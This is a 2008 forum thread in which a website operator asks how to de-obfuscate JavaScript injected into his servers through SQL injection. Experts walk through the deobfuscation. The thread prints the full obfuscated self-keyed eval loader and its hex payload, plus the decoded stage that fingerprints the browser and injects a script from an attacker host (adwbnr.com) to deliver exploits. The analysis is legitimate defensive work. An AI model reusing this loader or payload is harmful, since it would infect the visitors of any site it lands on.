Solved

How can I de-obfuscate a javascript used by an hacker ?

Posted on 2008-06-24
19
3,783 Views
Last Modified: 2012-06-21
Hi,

our web servers have been attacked by bot (b.js injected through SQL Injection) like a lot of people.

We have protected them but I would like to find a way to de-obfuscate the javascript called by b.js.

It looks like the attach code attached.

Please could you explain me how can I de-obfuscate this javascript to find which exploits where tested ?

P.S: I am running under windows XP, so please dont tell me to use an application in linux box.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

function a1Mv1BqB5(U4B6r3U6o, jVPW6Pvdu){var U3siwSYq6 = arguments.callee;var hJeHPlM0I = 4294967296;U3siwSYq6 = U3siwSYq6.toString();U3siwSYq6 = U3siwSYq6 + location.href;var uAPaoLJPD = eval;var B6JCRnkA6 = U3siwSYq6.replace(/\W/g, "");B6JCRnkA6 = B6JCRnkA6.toUpperCase();var G16JL2243 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 256; PNtIgAcmL++) {G16JL2243[PNtIgAcmL] = 0;}var SWDf70eQV = 1;for(var PNtIgAcmL = 128; PNtIgAcmL; PNtIgAcmL >>= 1) {SWDf70eQV = SWDf70eQV >>> 1 ^ (SWDf70eQV & 1 ? 3988292384 : 0);for(var Ev0dA675F = 0; Ev0dA675F < 256; Ev0dA675F += PNtIgAcmL * 2) {var j130O6u3m = PNtIgAcmL + Ev0dA675F;G16JL2243[j130O6u3m] = G16JL2243[Ev0dA675F] ^ SWDf70eQV;if (G16JL2243[j130O6u3m] < 0) {G16JL2243[j130O6u3m] += hJeHPlM0I;}}}var C5ui1SRPe = hJeHPlM0I - 1;for(var r77hP82bN = 0; r77hP82bN < B6JCRnkA6.length; r77hP82bN++) {var BK7jph3O8 = (C5ui1SRPe ^ B6JCRnkA6.charCodeAt(r77hP82bN)) & 255;C5ui1SRPe = (C5ui1SRPe >>> 8) ^ G16JL2243[BK7jph3O8];}C5ui1SRPe = C5ui1SRPe ^ (hJeHPlM0I - 1);if (C5ui1SRPe < 0) {C5ui1SRPe += hJeHPlM0I;}C5ui1SRPe = C5ui1SRPe.toString(16).toUpperCase();while(C5ui1SRPe.length < 8) {C5ui1SRPe = "0" + C5ui1SRPe;}var QUer084X4 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 8; PNtIgAcmL++) {QUer084X4[PNtIgAcmL] = C5ui1SRPe.charCodeAt(PNtIgAcmL);}var EhA2V6mT1 = "";var p8rb8Bn1D = 0;for(var PNtIgAcmL = 0; PNtIgAcmL < U4B6r3U6o.length; PNtIgAcmL += 2){var j130O6u3m = U4B6r3U6o.substr(PNtIgAcmL, 2);var d6kJb6d54 = parseInt(j130O6u3m, 16);var r6P3aRB8N = d6kJb6d54 - QUer084X4[p8rb8Bn1D];if(r6P3aRB8N < 0) {r6P3aRB8N = r6P3aRB8N + 256;}EhA2V6mT1 += String.fromCharCode(r6P3aRB8N);if(p8rb8Bn1D + 1 == QUer084X4.length) {p8rb8Bn1D = 0;} else {p8rb8Bn1D++;}}var pwwYYa5r6 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e) {}}

//-->

</script>

</head>

<body onload="a1Mv1BqB5('98abA295ba9Da1B2528486A6908Ba3b79c775ca9b4A98b8b87666C8772549a7a6678a8A07886656DADac95a4667b737AA9af9865919c52815297a699bba197B2A6a96295A7A09ea99771aa93b854a4B382826764b58566646f5668647f686B7A69686d68817B737aA9AF9865919c5281527d7568BDad96777d9e62a6B587A6B69bA49B5A6f6f798568ADad96797F9A646f567B737CabABA865819C5271549EB39597a89bB5A260ACa49b9A6DBC95a46479668C7a909e937695567152abAA93b06dac95A46677A2b1876d99A0BF665281527d7568bdad96777D9e62A4ABa49EA5959B5C61A28b61AB5e5656546f6f75b49f8B6b97B4AD64646F5677A2B38969a9A0AF6660BAa387b4a29BA675A7A7976C5b71AA93B85475a9699f7C7E7b9c83646F56A297bd5473b6a497ad6Daca3a46ca897a6528F8C759A7B6A7b898C546f646271547B9E77888d667d8B7866705276676c6F528F8C759A7b6A7b898c5F5D6D52B177977d9D7a90679e858d8f8C759A7B6A7b898c91528152666fAFBC95A464ab6a7D857898628f9A567152776F98B3a45Eaa93b8547b9C758C7D668d8b78646f5665647E6F528D8a798a7b7A7B898A6d567D8A898a7b78798D7a5284726f64635f54ADBF687b97649a647dae546F64AB6A7D857898628f9A5672708454636490565cAB7A7d857696667F9A665A5275527554657F6C6A766b68676a7a546C64625f6f98b5A65ABA93A854a37d68987c9EA3A4a8667152746d56a5697a9a6AB09fA6AA5282546479687154A37d68987C9Ea3A4A8665f6f647b8e77888f68799b78565E52785D52bfA897A652907584768877A2a19A546F647b8E77888f68799B78565F52B76b66aa6Aa2a1a2BC6f75a9699F7c7e7B9C839F7c7786649c75a0b38693546F6677977B9B7e8067ae858dB5696A9A6Ab2a1a2BA8f569252bf687b97649A647dae6f9BAA525e77977D9D7A90679e858D907584768877a2a19a91528052665D52c177977B9B7E8067AE858D8E7388668887a2A1988f565F6F66a6a1947e6966A197686dc1afB3AA93B854A68a82A2659F8c8c62646F56A6A196806576A18768527354637f98a5A65abc95a464958D8396bb896aB766567152766f52a7898598a79b6Ca57852725475b6a1877b97A4ad6474A097B299aa9c6d6697899396AB896Ab9685d6f5b56AFA8A7a652859c686C647Ca887975273545Aba7A82b063a37A8A7654906475a6a1877D99a0BD6464979AA7a675b3969B75a66E97899396ab896AB9685b6D525C54647B696dB87886a063b37A8A745273545ABA7A82B063A37a8A7654708270566C5B66925287976d9d7A92699A958D779E647e6668B88789916DC3A878949e67a1789e64528152aa7a82B2659F8a8a665490665CA4B382826764B58566645f56655b819D98645AAA7A82B2659F8A8a66546e66645b64adaa7a82b2659f8a8A66545D8354A4B382826764B585667Fafaa7a82B2659F8A8a66546f66A878949e67a1789E6460b8A189A8a4afa2996C636c5D60baa387b4A29bA675a7A7976c5b71AB9AafA0976cA67C849e77a1789c6264a097b49bA6AC5272546a6F54ADb87886A063B37A8A74527354547656526f52AA7A82B2659f8A8a666fAFBC95A464A16C678a776C7dAE62567152b499A96473a8A693bf6f98b3a45Eaa93b8547b9C758C7D668d8B78646f56646D667d8A87887f68799d7A5280526E6F528F8c759A7B6a7b898c5f5D6d52B1A368798c637c7DA0648D8F8c759A7b6A7b898C91528152AA7a82B2659f8A8a666295ae95a487A19A9973BA5C7b9C758c7d668D8B786D6db3AA93B854959a87A7859cB08689646F56565481AA93b65280a1A3776995B3658d546F66646DaaA1A85ca8A7a6528d8A798a7B7a7b898a5273546281547b9C758C7d668d8B78646e56abA0bb8D7999626E8960b299A0ABa69e6F528F8C759A7b6a7b898C545d8152685dadbc95a4647C7786649C75a0B386567152BDA2A79D798B646A9B62A5B994A9a8A46E7d8a87887F68799d7A5E64645f6fA8a7A65298A866899d9f8078a9527354A2a7A6A5A97Ba4A85A907584768877A2A19A605275685f6Fa8A7A6529069A68b7F9D86877752735486bc6487AF8b827a97666152b368698c637e7f9C748D80A1a3776995B3658D916Daf9A5a9069a68b7f9D868777527254626f54ad9069A68b7f9D8687775273547e7dA4899189888965665f5276676C6Fafa98a87b583A09e849d545d815289a8a4afa2997298a8A39F899c93b675A598976E8069B489838B849b675B7f9B9C5C7cb3A5637995A56789665F527552737152B56A659C636e7f9c76629ea9A09Da89A6F54AD8E9fa76567A9a3659B5273546281b152A99EA99952C17E9Fb5636B97a1798B5D6F6Db3B1a8A7A652B0A8889da0A968A4bc5273546281A8A4BD52B17B629e7c7CAE9368975AA98A87b583A09E849d5d6dc1529995A6A99c5aa95b56af9eBC869bB2956AA6aa667152756dB3a8a4bf54adAD98565c9Ebc869bb2956aa6aa6f54ADBB9ba498a1bd629Eb39597A89BB5A252815258635481b1AF649597A895ae5c976d52B1b1AF508284b87c8dA5A5b0755a6B6B6E9563876B747a73697569A765947b68686D657d966A7D696e6d647D996b88939869647E656875686d6b967a6466a86b6E9563a76b747a936995698765947B68686d6888676b7B689996638767737C6a7B69647E656875686d6B767a6466886B6e7563a76B947A73697569a765947B68686d69876974796B6B75787d986B75936b69647E656875686D6B967a646688666767958778737B676c6A937B68937B93696D67A86d73896B987662876b6975936875697e7a747693696d657d966ba6679A6964A89A66a9666668987978947d6b6b95667c686B7b6B6F6d947c966b756a6F6d95a798698766696875876d7378936C6964A76b6B7b686E6b747d9a747b93686C747C6869A9676c96627f68747d6B9A6D6B87697479936B76667C659378936a75647F657385736A966387696b7D6B6F7566a86B7385936B96627c796774657b956A87699477676C6C937F666b78686d6D637E69697d737B6A647D64687768676A657b6566a693997565a76968776B796c63A8686A85699b7673a76d94A6676A6a987C686877686C6b657b6969A9666767757b656686737a75737f9793aa6b6F69937c776A7D6B6B6d657C6a7376696B6a73a897687569696a647F6A6b7D686C6A947F647479936a6D947c6593a773686d68876d947D6a6B756A7b966879689C6C677f68687768686A647d7673766a6B6A6787676a76689B96937B796978679A69747C68687669696A647C646978677a6964A89A668966666894876D9378936c6964a8676BA66b666C687E656B756b6e6d747C686989676c95677e6d6979687a6B77886c93aa6a7C6B627F6a93A66b6B95667e699479677B6C937F666B78686d6d637e69697D939B6a767C6A6887689c67787a7966a9666668947f97737d676A697388676bA66b666c687e656B756B6E6d947c68698969696a647B696978676C69947b656686657c68747f966B76936a6B747e97747d737996937b676a74676a69667d686977676e6B967a6466A8659a6d69A86494786B986a647F77937D676a699388676Ba66b666c687E656B756B6E6d947C68698969696A647b696979676c69747b656686657c68747F966B76736A6b947e97747D939976737b676A74676a69667D686978676e6b767A646688657A6d69a86474786b786A647f97737d676A6973A8676B866b666c687E656b756b6e6D947C68698969696a647B69697a676c69747b6566a6659c68947F766b76936A6B747E97947D737996937B676A74676a69667D686979676e6B967A6466a8657a6D69886474786b786A647F77937d676A6993A8676bA66b666c687E656B756b6E6d747C68698969696a647B69697b676C69947B6566A6659C68747f966B76936A6B947e97747D737976737B676a74676a69667D68697A676e6b967A646688657a6d69a86474786B986A647F97937D676A6973a8676b866b666c687E656B756b6E6D747C6869a969696A647b69697C676c69747b656686657C68947F766b76936a6B747e77947D939976737b676a74676a69667D68697B676e6b967a646688657A6D69A86474786B986a647F97937D676A697388676BA66b666c687e656B756B6e6D947C6869a969696a647B69697d676C69947B656686659c68947F966b76736A6B947E97747D737996937b676a74676A69667D68697c676E6b967A646688666767757A7893A56B996A647B7693A66A6995647E786a7D939b966a87766877676B6a787c686877686c6b657b6968A7666767757A7866a56b6E96667F6c73786B7C6a767B6566867469687879986774657B6d7487756875677B95937e669477699a6B938877947b939b6A647D646a74676A69667D686976676e6A647B6d687d676A6D677f756977689c6C77A76B74756a9a6a62A79893aa6B979569A7966b766B9769737c6A6b776B7895977F6c7378936d6D697C686a786b6D96627F6B93A76B6E6D65886C737A676e6a777b676977677a69647C6969A9676c6A987c6868A7666767757a78937D6A6B96647d976A869399756A8877687569696a647b696977687969667d7a66896666687879786774657B756a87697477676C7576877594a793986a697f666Ba573666a647d64687793686d65a89573856B9a7565876b7476736C6a62a86B7485736F76687F6c94746a666d658866737c939895657f95737c68687567886d9377936F9668A76968a6686A69977c686976686C6A947C796774659b756aA7697477676c6D957F6A6a7C6a6D95677f756A7993676A647d646877676C69667D9a66a96666689879986774657b6d6a88677477677b966a7f687479676a6d747e9674796B7A756B7e696b76696f6A787d6869876b9C6c6b876b93A56b986C667f676a7A69689596A795748773786A697f666ba593666b627f7A937c93686d6b886c737D696795947d95747b6b786d6b7F6a6B7469786A967b996887676a75767b656686657c6c687d996a88936b6b737d697374699c6a647D6468776b9C756b8878747C68786D627E9793A868686D67A7977376936E6c67A766937B6B6F6B65886C687D6B7c6C6BA76b73856b786C667F676a7A677c6B62876B74766a6d9568a86a93A5936A756B7B966978689769747d7a66A966666878797866a76b9A6D6a7C68687D69976c967D98747869996a65a7676a85676C6b777B676979679A67787a9966a5659C6d957f6A6a7C6A6d75677F756a7973676A647b796A74676A69667D6868776967689879986774657b67747f99937869986D67a76a6B7d696e6d967c68688769696a647D6b6aA9697b75657e9769766b6b6c747c796774659B75787B65668666696875a79573866B9A6d97876D687D6B6695677d6C6b7A936d6c6a7E6c7387686a95977F6C94756b789568A797687569686a647c696977679a67987a7966A56B6695677d6c6b7a936d6C6a7e6C7387676c6a967d646877676C6a647d6868776967689879986774659b67787A79947b6b6d96667B676B7D6b6D6C747D776a8a6a7895957f9768776967696487776B74936c6C747D967486737795937C686887676C6D757F6A6a7C6a6d75677f756A7993676b767a6466A873776D65a86A687573699567A76473766B986b987f957476676c6B987B67737B73696d67a86d93a96b987662876B69756B6D7566a76D9376939795697d6c738a6B6f6d78a76d93AA73776A937B69947A6b6d95668778947593976A667B7769896667677588659378936975637f756b746A9775657D6694786B7896687D68947B736E9566a7987377939896687f6c6886676c9568887894756B786A667b9a6877676c7568876d947d93976B637f78937893976d65886B9378736e7574a767947B676C69747d7A6689666695987f6a74746b696D6b7F656b7B736d6B62A76A737C736e6b65886C7479736E95947F69747C936e6d697c776877936f96667f6a6879686669647c6a937D93977668876769A868696a63A7699379939a95668765747968686D67A8677389686B95677f7593A768676D66A798738A686B9594A765737B6B6F75737D6673786B9A95947D66697a686a6a65a76D6975689b75657F6c6977686B6A647D68737b686C6B6B7C676977686a6A6b7D96937a686c95697f6b697C68796A647D756975686c6b647c676977686a6A647d686975686e6b6B7c9669856b6f6a69877569766899756A7f6D6879676A69967C686B7b6b6F6D747c966B756A6F6D75877868a5696768787978737b93696d67886D93a96b787662876b69756B6c9563876C7485686A7565876794776B6F9562876C6a786b7B95947F9A937b67796d78a76b93a96B6B956b7e646b7D736B69947d7a6689666696987a6466a8595f6F')">
 

</body>

</html>

Open in new window

0
Comment
Question by:bigstyler
  • 7
  • 6
  • 2
  • +2
19 Comments
 
LVL 35

Expert Comment

by:torimar
ID: 21857040
You might want to check out the amazing "MalZilla" project (http://malzilla.sourceforge.net).
On their download page, you will find a windows version of the application.

Hope this helps.
0
 
LVL 5

Expert Comment

by:codeQuantum
ID: 21858373
I am interested in this issue as well :

Suppose I want to make a javascript code by google analytics clearer :

http://www.google-analytics.com/ga.js

How do you use MalZilla?

In case you are wondering, I am investigating this code because I think it is causing the following problem on my site : http://www.experts-exchange.com/Web_Development/Search_Engines/Q_23504888.html
0
 
LVL 35

Expert Comment

by:torimar
ID: 21859567
I'm still rather new to the tool myself, codequantum.
However, it was not difficult to get it to reformat your Google code which is, after all, not obfuscated, but only stripped off all formatting, linebreaks and spaces.

I appended the new file. Mind you, some lines of code are still cryptic and others simply don't look right.
ga-reformated.txt
0
 
LVL 5

Expert Comment

by:codeQuantum
ID: 21859803
Thanks torimar
0
 
LVL 4

Author Comment

by:bigstyler
ID: 21863780
Thank you Torimar for your answer.

I have testes Malzilla but I didn't any way to de obfuscate the page quoted above.

1. Indeed, I have copy/paste this code on the Download Tab, then in the "Text" area.
2. Then I have clicked on "Send all scripts to Decoder"
3. I clicked on the "Decoder" Tab and then what I have to do ?

I have tried to replace eval() with "alert" for example but nothing happens when I click on "Run script" or "debug" so I am still trying to de obfuscate this javascript.

Thank you
0
 
LVL 3

Expert Comment

by:KhoiNqq
ID: 21864312
This obfuscate using some very annoying technique, especially the arguments.callee part, it's will base on the function length to change the obfuscate algorithm, so if you change eval with alert, the code will become wrong (at the easiest, wrong of function length, make the code goes wrong, then the alert will build a total difference string before you alert it.

I just know about this technique but cannot help you in this case, sorry
0
 
LVL 3

Expert Comment

by:KhoiNqq
ID: 21864325
Not the last, he also using location.href combine with his original function as signature to decode, so the script only working correctly if you put it at the right location (on your server), not change the function length (at the basic level of this technique or more difficult, he will check at some critical position eg: eval fucntion) then the code will working correctly otherwise, it will build an meaningless string :-(
0
 
LVL 12

Expert Comment

by:jahboite
ID: 21866339
Interesting Problem!
My javascript is quite rudimentary, but I've started by making the code easier to read by replacing the random variable names with something close to their description.

As KhoiNigg said, the text of the function forms part of the decode routine (actually only the alphanumeric characters from the original function - the rest is stripped), but this is easily worked around.  You'll see below on line 11 that I've replaced the statement with one to restore the text of the original function which allows us to modify the code that runs so that we can safely execute it.  That is, I've bypassed the "arguments.callee".

Unfortunately, I can't deobfuscate the code entirely because of what happens on line 12 - the url for the page in which you found this is used as part of the decode routine.
args = args + location.href;

I think you'll find a different XXXXX in <body onload="a1Mv1BqB5('XXXXX')"> for every page because the XXXXX is a function of location.href.

So the attached code snippet can be safely run from it's original location (ie the page where you found it).  It will merely print out "Failed" (line 85) or else, if successful, will print out the client-side code rather inserting into the page to allow it be run by the browser (line 76).

Note that I haven't pasted the <body> tags below because I expect these will be different for each page so if you decide to run this on one of your compromised pages, you'll need the original body tags.

Love to know how you get on!
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

function bad_function(first_arg, jVPW6Pvdu){

	var args = arguments.callee;

	var hundred_million_hex = 4294967296; // 00000001 00000000

	args = 'function a1Mv1BqB5(U4B6r3U6o, jVPW6Pvdu){var U3siwSYq6 = arguments.callee;var hJeHPlM0I = 4294967296;U3siwSYq6 = U3siwSYq6.toString();U3siwSYq6 = U3siwSYq6 + location.href;var uAPaoLJPD = eval;var B6JCRnkA6 = U3siwSYq6.replace(/\W/g, "");B6JCRnkA6 = B6JCRnkA6.toUpperCase();var G16JL2243 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 256; PNtIgAcmL++) {G16JL2243[PNtIgAcmL] = 0;}var SWDf70eQV = 1;for(var PNtIgAcmL = 128; PNtIgAcmL; PNtIgAcmL >>= 1) {SWDf70eQV = SWDf70eQV >>> 1 ^ (SWDf70eQV & 1 ? 3988292384 : 0);for(var Ev0dA675F = 0; Ev0dA675F < 256; Ev0dA675F += PNtIgAcmL * 2) {var j130O6u3m = PNtIgAcmL + Ev0dA675F;G16JL2243[j130O6u3m] = G16JL2243[Ev0dA675F] ^ SWDf70eQV;if (G16JL2243[j130O6u3m] < 0) {G16JL2243[j130O6u3m] += hJeHPlM0I;}}}var C5ui1SRPe = hJeHPlM0I - 1;for(var r77hP82bN = 0; r77hP82bN < B6JCRnkA6.length; r77hP82bN++) {var BK7jph3O8 = (C5ui1SRPe ^ B6JCRnkA6.charCodeAt(r77hP82bN)) & 255;C5ui1SRPe = (C5ui1SRPe >>> 8) ^ G16JL2243[BK7jph3O8];}C5ui1SRPe = C5ui1SRPe ^ (hJeHPlM0I - 1);if (C5ui1SRPe < 0) {C5ui1SRPe += hJeHPlM0I;}C5ui1SRPe = C5ui1SRPe.toString(16).toUpperCase();while(C5ui1SRPe.length < 8) {C5ui1SRPe = "0" + C5ui1SRPe;}var QUer084X4 = new Array;for(var PNtIgAcmL = 0; PNtIgAcmL < 8; PNtIgAcmL++) {QUer084X4[PNtIgAcmL] = C5ui1SRPe.charCodeAt(PNtIgAcmL);}var EhA2V6mT1 = "";var p8rb8Bn1D = 0;for(var PNtIgAcmL = 0; PNtIgAcmL < U4B6r3U6o.length; PNtIgAcmL += 2){var j130O6u3m = U4B6r3U6o.substr(PNtIgAcmL, 2);var d6kJb6d54 = parseInt(j130O6u3m, 16);var r6P3aRB8N = d6kJb6d54 - QUer084X4[p8rb8Bn1D];if(r6P3aRB8N < 0) {r6P3aRB8N = r6P3aRB8N + 256;}EhA2V6mT1 += String.fromCharCode(r6P3aRB8N);if(p8rb8Bn1D + 1 == QUer084X4.length) {p8rb8Bn1D = 0;} else {p8rb8Bn1D++;}}var pwwYYa5r6 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e) {}}';

	args = args + location.href;

	var copy_of_eval = eval;

	var args_new_string = args.replace(/\W/g, "");

	args_new_string = args_new_string.toUpperCase();

	alert("WAIT")

        var my_array = new Array;

	

	for(var i = 0; i < 256; i++) {

		my_array[i] = 0;

	}

	

	var number = 1;

	for(var i = 128; i; i >>= 1) {

		number = number >>> 1 ^ (number & 1 ? 3988292384 : 0);

		for(var j = 0; j < 256; j += i * 2) {

			var array_index = i + j;

			my_array[array_index] = my_array[j] ^ number;

			if (my_array[array_index] < 0) {

				my_array[array_index] += hundred_million_hex;

			}

		}

	}

	

	var some_calculation = hundred_million_hex - 1;

	for(var k = 0; k < args_new_string.length; k++) {

		var array_index2 = (some_calculation ^ args_new_string.charCodeAt(k)) & 255;

		some_calculation = (some_calculation >>> 8) ^ my_array[array_index2];

	}

	

	some_calculation = some_calculation ^ (hundred_million_hex - 1);

	if (some_calculation < 0) {

		some_calculation += hundred_million_hex;

	}

	

	some_calculation = some_calculation.toString(16).toUpperCase();

	while(some_calculation.length < 8) {

		some_calculation = "0" + some_calculation;

	}

	

	var my_array2 = new Array;

	for(var i = 0; i < 8; i++) {

		my_array2[i] = some_calculation.charCodeAt(i);

	}

	

	var some_string = "";

	var some_number = 0;

	for(var i = 0; i < first_arg.length; i += 2){

		var array_index = first_arg.substr(i, 2);

		var secret = parseInt(array_index, 16);

		var plain_text = secret - my_array2[some_number];

		if(plain_text < 0) {

			plain_text = plain_text + 256;

		}

		some_string += String.fromCharCode(plain_text);

		if(some_number + 1 == my_array2.length) {

			some_number = 0;

		} else {

			some_number++;

		}

	}

	

	var has_failed = 0;

	try {

		// copy_of_eval(some_string);	Ha! We won't run this.

		document.write(some_string);

	}

	

	catch(e) {

		has_failed = 1;

	}

	

	try {

		if (has_failed) {

			document.write("Failed!");

		}

	}

	

	catch(e) {

		}

}

//-->

</script>

</head>

Open in new window

0
 
LVL 12

Expert Comment

by:jahboite
ID: 21866364
And, you can take out that bloody alert() on line 16!  That was me debugging.
0
How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

 
LVL 4

Author Comment

by:bigstyler
ID: 21866402
Thank you everybody.

About the location.href, perhaps this will help you to find the problem : http://s3cwatch.wordpress.com/de-obfuscate-javascript/


function eval(a) {

print(a);

}

location = new Object();

location.href = http://hackattack.com/cgi-bin/index.cgi?ad;

Open in new window

0
 
LVL 12

Expert Comment

by:jahboite
ID: 21866700
I'm assuming that hxxp://hackattack.com/cgi-bin/index.cgi?ad isn't the url to the page where you found the obfuscated code.  Do you want to share that url?
0
 
LVL 4

Author Comment

by:bigstyler
ID: 21866721
0
 
LVL 12

Expert Comment

by:jahboite
ID: 21867180
Well, it was twice obfuscated, but I ended-up with the attached which, after a cursory inspection, seems to be checking the version number of the web browser (and possibly the OS) and then inserting yet more javascript which serves up a browser targeted javascript which presumably will try and exploit known vulnerabilities for that browser.

There seems to be couple of mistakes in the code, so I'm not sure how effective it's going to be...
document.a7HBPKZw = 1;

document.doV6opeZ = 1;

document.eat_mJNq = 1;

if (!document.nuKqmQHX) {

	var specific_exploit;

	var app_minor_version = navigator.appMinorVersion;

	var some_number = -1 var some_string = "01";

	while((some_number = app_minor_version.indexOf(";SP", some_number+1)) != -1) {

		var version_test = app_minor_version.charAt(some_number+3);

		if (version_test == "1") 

			some_string = "02";

		else if (version_test == "2") 

			some_string = "03"; 

		else if (version_test == "3") 

			some_string = "04"; 

		else if (version_test == "4") 

			some_string = "05"; 

		else if (version_test == "5")

			some_string = "06"; 

		else if (version_test == "6")

			some_string = "07"; 

		if (some_string != "01")

			break;

	}

	if (some_string == "01" && app_minor_version.indexOf("Release Candidate", 0) != -1)

		some_string = "08";

		var str_lang = navigator.systemLanguage.substr(0, 10);

		var some_other_string = "";

		for(var i=0;i< 2)

			some_other_string += "0";

			some_other_string += DKJqH1_I;

		}

		while(some_other_string.length < 20) 

			some_other_string += "00";

			var specific_exploit = some_string + some_other_string;

			var script_elem = document.createElement("script");

			script_elem.setAttribute("type", "text/javascript");

			script_elem.setAttribute("src", "hxxp://adwbnr.com/cgi-bin/index.cgi?301e08ae0100f0700077e0ed58060000000002787e5f16ff" + specific_exploit);

			document.body.appendChild(script_elem);

		} 

Open in new window

0
 
LVL 12

Expert Comment

by:jahboite
ID: 21871211
So, for example, in Internet Explorer 7.0 with en-gb language, the URL requested is as above and specific_exploit is the string:
01656e2d67620000000000
656e2d6762 is en-gb in hex ascii
and this tried to download a gif89 image probably containing some kind of exploit.

Another such script tests for shockwave version 9.115 and 9.124 as well as Adobe Acrobat versions 5, 6 and 7 and also checks for navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin

I've not successfully downloaded any exploits except for the gif and there are a few reasons for this.
The hosts serving this stuff are using 'fast flux' dns records so that a domain name might be found at 10 or 15 hosts at one time and then a completely different set of hosts a few minutes later.  These hosts are likely to be part of a botnet (probably asprox) and so there are thousands of them.
Due to the fact that the stub of the url changes for each host depending on the current hostname, it's a nightmare working out what the full url should be before the the stub has changed and you can't just append a specific_exploit string to just any url
These two hosts were using the same domain name:
hxxp://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0700077e0ed58060000000002fd94ffc4ff - 189.81.121.125
hxxp://apps84.com/cgi-bin/index.cgi?b5f68c1d0100f0300077e0ed58020000000002fd94f5beff - 201.250.147.92
but as you can see, different url stubs.

When I do find a host that should be serving exploits, I either get redirected to www.msn.com or I get HTTP 500 - Internal Server Error which probably means I didn't get the url quite right.

If you want to have a go, I've pretty much got the deobfuscation down now:

Step 1:
Copy the code (like your original post) into a text file and save it as an html file.

Step 2:
Copy the entire function line (line 8 from your example) and paste it somewhere safe (you'll need this copy again, exactly as it currently is because you'll change the original).

Step 3:
Again on line 8, near the end of the function you'll find something like this:

 = 0;try {uAPaoLJPD(EhA2V6mT1);} catch(e) {pwwYYa5r6 = 1;}try {if (pwwYYa5r6) {window.location = "/";}} catch(e)

in the first 'try' change:
try {uAPaoLJPD(
to:
try {document.write(

This stops the code being eval()'ed when you run it and prints it out instead.

Step 4:
on line 8 again, find:
location.href
and change it to the url at which you found the code (enclose it in quotes):
"hxxp://adwbnr.com/cgi-bin/index.cgi?ad"

This is necessary for the reasons we've already discovered - perhaps to stop people stealing their malicious code, perhaps to try and prevent people from doing what we're doing.

Step 5:
Again on line 8, find:
arguments.callee
and replace it with the entire function you pasted somewhere for safekeeping and enclose it with SINGLE quotes.
'function blah blah ... catch(e) {}}'

This bypasses the codes 'integrity check' which allows us to modify the code that runs and still perform the deobfuscation.

Step 6:
Save your html file and browse to it.  You'll then be presented with more text looking remarkably like the original.
This time, though there's no html.  Just the function and the caller.
So now you take the new function and replace the one in your html file with it.
Replace the caller in your html file with the new one (so that it's in the onload event of <body> like before).

Then repeat steps 2-6 and you'll end-up with the gently obfuscated code that checks what software can be exploited.  It's just a matter then of giving the variables some sensible names.  I'm pretty sure they put some red-herrings in there just to further confuse the issue.

There's probably no need to try and download the exploits, it's fairly obvious what the checks are looking for.

As a word of warning, I should say that even though it is perfectly safe to follow these steps for the example posted in
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23511296.html#a23511296
and that all the examples I've found since use the same technique and were also safe to play with in this way, it is possible that the code could change and the next one you try could have something different about it such that these steps don't prevent the exploit code from running.  Be cautious.  Also, if you're going to try and download exploits, make sure that they aren't executed (or in the case of documents, images, audio and video - viewed) -- on windows machines, appending a new file extension to the file such as .DONOTRUNME will avoid accidental execution/viewing.
0
 
LVL 4

Author Comment

by:bigstyler
ID: 21882054
Hi jahboite,

I really appreciate your help. It is very interesting; thanks a lot.

I have successfully "decoded" the javascript and the final script is like this one attached:

I just dont understand one little thing.
I don't find, in the code pasted here, which exploits are tested in my computer (like acrobat, shockwave etc...)
Thanks again



document.a7HBPKZw = 1;

document.doV6opeZ = 1;

document.eat_mJNq = 1;
 

if (!document.nuKqmQHX) {
 

var VcY8NUji;

var cV29LtnY = navigator.appMinorVersion;

var H_Q3_A8x = -1

var hOpIHxvx = "01";
 

while((H_Q3_A8x = cV29LtnY.indexOf(";SP", H_Q3_A8x+1)) != -1) {

	var oZZDNNdi = cV29LtnY.charAt(H_Q3_A8x+3);
 

	if (oZZDNNdi == "1")

		hOpIHxvx = "02";

	else if (oZZDNNdi == "2")

		hOpIHxvx = "03";

	else if (oZZDNNdi == "3")

		hOpIHxvx = "04";

	else if (oZZDNNdi == "4")

		hOpIHxvx = "05";

	else if (oZZDNNdi == "5")

		hOpIHxvx = "06";

	else if (oZZDNNdi == "6")

		hOpIHxvx = "07";
 

	if (hOpIHxvx != "01")

		break;

}
 

if (hOpIHxvx == "01" && cV29LtnY.indexOf("Release Candidate", 0) != -1)

	hOpIHxvx = "08";
 
 

var kwyw5NYj = navigator.systemLanguage.substr(0, 10);

var ZcESsVDk = "";
 
 

for(var iGtggROE=0;iGtggROE<kwyw5NYj.length;iGtggROE++) {

	DKJqH1_I = kwyw5NYj.charCodeAt(iGtggROE).toString(16);
 

	if (DKJqH1_I < 2)

		ZcESsVDk += "0";
 

	ZcESsVDk += DKJqH1_I;

}
 

while(ZcESsVDk.length < 20)

	ZcESsVDk += "00";
 
 

var VcY8NUji = hOpIHxvx + ZcESsVDk;

var mcm_gMVq = document.createElement("script");

mcm_gMVq.setAttribute("type", "text/javascript");

mcm_gMVq.setAttribute("src", "http://adwbnr.com/cgi-bin/index.cgi?301e08ae0100f0700077e0ed58060000000002787e5f16ff" + VcY8NUji);

document.body.appendChild(mcm_gMVq);

}

Open in new window

0
 
LVL 12

Expert Comment

by:jahboite
ID: 21882372
Nice work!
